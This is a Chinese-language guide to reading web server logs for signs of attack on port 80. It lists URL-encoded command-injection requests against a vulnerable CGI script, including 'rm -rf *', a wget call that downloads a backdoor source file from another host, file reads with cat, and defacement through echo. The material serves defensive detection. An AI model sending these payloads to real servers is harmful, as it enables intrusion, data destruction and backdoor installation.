80端口web服务攻击痕迹事件分析

一个perl写的有问题的cgi程序，会导致执行id命令
[更进一步]
下面部分将讨论更多的攻击者可能执行的命令，连同被请求的文件，以及如果你有远程执行命令的缺陷，应该怎样检查发现它。这部分只是给你个好的思路，并告诉你的系统发生了什么，攻击者尝试攻击你的系统的痕迹，但并不能列举所有的攻击者使用的命令和请求的方式。

\"/bin/ls\"
这个命令请求整个路径，在很多的web应用程序中都有这个漏洞，如果你在日志中很多地方都看到这种请求，很大的可能性是存在远程执行命令漏洞，但并不一定是个问题，也可能是个错误的警报。再一次提醒，写好的web应用程序（cgi,asp,php...etc)是安全的基础

Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;

\"cmd.exe\"
这是一个windows的shell,一个攻击者如果访问并运行这个脚本，在服务器设置允许的条件下可以在windows机器上做任何事情，很多的蠕虫病毒就是通过80端口，传播到远程的机器上
http://host/scripts/WINNT/system32/cmd.exe?dir%252Be:

\"/bin/id\"
这是个2进制的文件，它的问题和/bin/ls一样，如果你在日志中很多地方都看到这种请求，很大的可能性是存在远程执行命令漏洞，但并不一定是个问题，也可能是个错误的警报。
它将显示属于哪个用户和属于哪个组
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;

\"/bin/rm\"
这个命令可以删除文件，如果不正确的使用是非常危险的
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;

\"wget and tftp\" 命令
这些命令常被攻击者用来下载可能进一步获得特权的文件，wget是unix下的命令，可能被用来下载后门程序，tftp是unix和nt下的命令，用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/Phantasmp.c;

\"cat\" 命令
这个命令用来查看文件内容，常用来读重要的信息，比如配置文件，密码文件，信用卡文件和你能够想到的文件
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;

\"echo\" 命令
这个命令常用于写数据到文件中，比如“index.html”
Examples: >%200day.txt’>http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20\"fc-#kiwis%20was%20here\"%20>>%200day.txt| >%200day.txt’>http://host/cgi-bin/bad.cgi?doh=echo%20\"fc-#kiwis%20was%20here\"%20>>%200day.txt;

\"ps\" 命令
列出当前运行的进程，告诉攻击者远程主机运行了那些软件，以便从中得到一些安全问题的主意，获得进一步的权限
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux;